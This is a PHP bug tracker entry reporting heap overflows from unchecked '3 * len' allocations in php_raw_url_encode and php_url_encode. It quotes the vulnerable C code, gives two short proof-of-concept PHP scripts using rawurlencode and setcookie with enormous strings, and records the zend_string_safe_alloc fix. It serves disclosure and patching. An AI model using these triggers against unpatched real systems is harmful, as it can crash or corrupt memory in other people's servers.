Bug #71750 Multiple Heap Overflows in php_raw_url_encode/php_url_encode
Submitted: 2016-03-09 05:27 UTC Modified: 2016-03-21 06:10 UTC
From: taoguangchen at icloud dot com Assigned:
Status: Closed Package: *General Issues
PHP Version: 7.0.4 OS:
Private report: No CVE-ID:
 [2016-03-09 05:27 UTC] taoguangchen at icloud dot com
Description:
------------
Vulnerable code:
```c
PHPAPI zend_string *php_raw_url_encode(char const *s, size_t len)
{
	...
	/* allocation size computed as 3 * len with no overflow check */
	str = zend_string_alloc(3 * len, 0);
	for (x = 0, y = 0; len--; x++, y++) {
		ZSTR_VAL(str)[y] = (unsigned char) s[x];
	...
PHPAPI zend_string *php_url_encode(char const *s, size_t len)
{
	...
	/* same unchecked 3 * len computation */
	start = zend_string_alloc(3 * len, 0);
```

PoC:
```php
<?php
//php_raw_url_encode
ini_set('memory_limit', -1);
rawurlencode(str_repeat('A', 0xffffffff/3));
```

```php
<?php
//php_url_encode
ini_set('memory_limit', -1);
setcookie('hi', str_repeat('A', 0xffffffff/3));
```

Fix:
Use zend_string_safe_alloc instead.


History

 [2016-03-21 05:38 UTC] stas@php.net
This also does not look like a security issue; it requires specially crafted code.
 [2016-03-21 06:10 UTC] stas@php.net
-Type: Security +Type: Bug
 [2016-03-21 06:11 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c4517b2a5e3141393c1c4f6fca51e1c325e91251
Log: Fix bug #71750: use zend_string_safe_alloc for calculated allocations
 [2016-03-21 06:11 UTC] stas@php.net
-Status: Open +Status: Closed
 [2016-07-20 11:32 UTC] davey@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=c4517b2a5e3141393c1c4f6fca51e1c325e91251
Log: Fix bug #71750: use zend_string_safe_alloc for calculated allocations
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Tue Jul 25 22:01:35 2017 UTC